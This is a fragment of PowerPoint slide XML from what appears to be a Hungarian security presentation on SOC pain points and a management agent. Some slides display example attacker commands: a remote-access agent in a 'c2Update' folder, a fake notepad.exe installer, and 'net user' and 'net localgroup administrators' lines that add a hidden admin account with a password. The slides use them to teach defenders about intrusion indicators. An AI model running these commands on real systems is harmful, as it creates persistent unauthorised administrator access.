            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792818" y="851318"/>
            <a:ext cx="14745843" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FÁJDALOMPONTOK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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7A109C-6AB9-BA14-AAB2-0B03120AF92D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134166" y="5628491"/>
            <a:ext cx="4156054" cy="1327286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="50799">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="262783" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="00BBC5">
                <a:alpha val="72000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="sk-SK"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr" defTabSz="1358570">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2972" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" indent="-349200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>ált erőforrások</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-349200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>SOC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>csapat drága</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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A8DA1C-9FE8-D8CF-9D8C-10A43D7AD16D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043803" y="4871833"/>
            <a:ext cx="4090295" cy="915635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="50799">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="262783" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="00BBC5">
                <a:alpha val="72000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="sk-SK"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr" defTabSz="1358570">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2972" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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sk-SK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PÉNZ</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="3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796C36-0CC3-2D66-2629-F00F56B48C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6661857" y="5628491"/>
            <a:ext cx="5007764" cy="1327286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="50799">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="262783" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="00BBC5">
                <a:alpha val="72000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="sk-SK"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr" defTabSz="1358570">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2972" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" indent="-349200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Nagy számú riasztás</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-349200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>– 700 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inciden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>s/hó</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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FFF8F0-6B7A-24A5-57B2-0FEC44216F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12094758" y="5628491"/>
            <a:ext cx="6193242" cy="1327286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="50799">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="262783" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="00BBC5">
                <a:alpha val="72000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="sk-SK"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr" defTabSz="1358570">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2972" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" indent="-349200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Azonosítás és vizsgálat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-349200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Folyamatosan változó harctér</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3A651F-441D-9A83-8278-5D75A90D7D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6857838" y="4871833"/>
            <a:ext cx="4090295" cy="915635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="50799">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="262783" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="00BBC5">
                <a:alpha val="72000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="sk-SK"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr" defTabSz="1358570">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2972" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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sk-SK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IDŐ</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="3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06945C-86D0-8733-9A3C-9AC7D08DABF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12448366" y="5029850"/>
            <a:ext cx="4090295" cy="915635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="50799">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="262783" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="00BBC5">
                <a:alpha val="72000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="sk-SK"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr" defTabSz="1358570">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2972" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/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sk-SK" sz="3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KNOW-HOW</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="3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830C85D-CF75-055E-EE41-AD83B439DA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692004" y="2446133"/>
            <a:ext cx="2425700" cy="2425700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="212251">
              <a:schemeClr val="bg1">
                <a:alpha val="13000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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1BA97DC-1903-BFC4-BAF5-70FC208DBC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3276991" y="2604629"/>
            <a:ext cx="2425700" cy="2425700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="212251">
              <a:schemeClr val="bg1">
                <a:alpha val="13000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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B780B5B-4D91-AFDF-AD70-F973486C4B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107017" y="2446133"/>
            <a:ext cx="2425700" cy="2425700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="212251">
              <a:schemeClr val="bg1">
                <a:alpha val="13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187620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10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5F7814-2326-E19F-2F7B-E56CAE595D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56268" y="4718697"/>
            <a:ext cx="10955867" cy="1608667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="9600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>anagement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="9600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gent</a:t>
            </a:r>
            <a:endParaRPr lang="en-SK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4B670B7-A5CB-5267-DDC7-81C6F43027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2846251" y="4060304"/>
            <a:ext cx="2925455" cy="292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91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55A229-3A1D-BEBE-7128-02C737FD9A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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{677BEAFF-3C72-4B36-021C-485BA7FF64D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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86D07056-C579-9C0A-8C47-4E398804D6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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBA3F7E5-36E2-54D7-1EF8-853D4F3751E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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8366BA6D-10F3-A756-9210-F9871D48B0B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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235B49D2-FC2D-E589-DE16-C55AC24F6AB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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680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69C36D4-B6C6-485B-18CA-5F1822E8873F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508204" y="2162477"/>
            <a:ext cx="15357396" cy="6524323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3195"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1"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0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="12700">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="32000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="75000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx2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FC6A0DC-0768-D9E2-89AB-ADBE4EE48D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819442" y="3867903"/>
            <a:ext cx="11026918" cy="457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400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProgramFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c2Update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\MeshAgent.exe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3D159F1-A02C-89DB-092D-BB6DDC9D98F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550600" y="3055687"/>
            <a:ext cx="11304302" cy="386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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fullinstall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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D165D9B9-D266-F2C6-C7D6-CEF1B9B72C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590176" y="3627642"/>
            <a:ext cx="1020018" cy="102001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C62CD6B-D5D4-DA7E-8433-E84CCE253C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2215199" y="2359643"/>
            <a:ext cx="1087909" cy="1470869"/>
            <a:chOff x="2215199" y="2359643"/>
            <a:chExt cx="1087909" cy="1470869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 6" descr="200+] Devil Horns Pictures | Wallpapers.com">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F0339A-41B3-4500-DEF5-746D6E2C16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71091">
              <a:off x="2215199" y="2359643"/>
              <a:ext cx="1087909" cy="10879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D3B701BF-39E4-0B08-FA3D-6B58D1AA9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2221876" y="2768953"/>
              <a:ext cx="1061559" cy="1061559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DA78EB5-621D-0679-9549-51B821555157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4819445" y="6853128"/>
            <a:ext cx="11604285" cy="1101665"/>
            <a:chOff x="4168376" y="5137392"/>
            <a:chExt cx="6240727" cy="741470"/>
          </a:xfrm>
          <a:noFill/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B45E5B3-AC9B-32C1-B096-60740D95E466}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4168376" y="5137392"/>
              <a:ext cx="6240726" cy="3670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400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>C:\&gt; net user /add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>system1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 3@5yPa55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07DD330-5BC0-D0AE-E901-78057F9DC584}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4168376" y="5511858"/>
              <a:ext cx="6240727" cy="3670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400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>C:\&gt; net </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>localgroup</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> administrators </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>system1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /add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2A4CE8A-9A6C-F379-B43F-F5BD5AD41B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4819443" y="5728834"/>
            <a:ext cx="11264116" cy="1084752"/>
            <a:chOff x="4168375" y="4138569"/>
            <a:chExt cx="6240727" cy="730087"/>
          </a:xfrm>
          <a:noFill/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A8833C0-E2DD-B7F7-FFE3-E2460F11E3DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4168375" y="4138569"/>
              <a:ext cx="6240726" cy="3670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400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
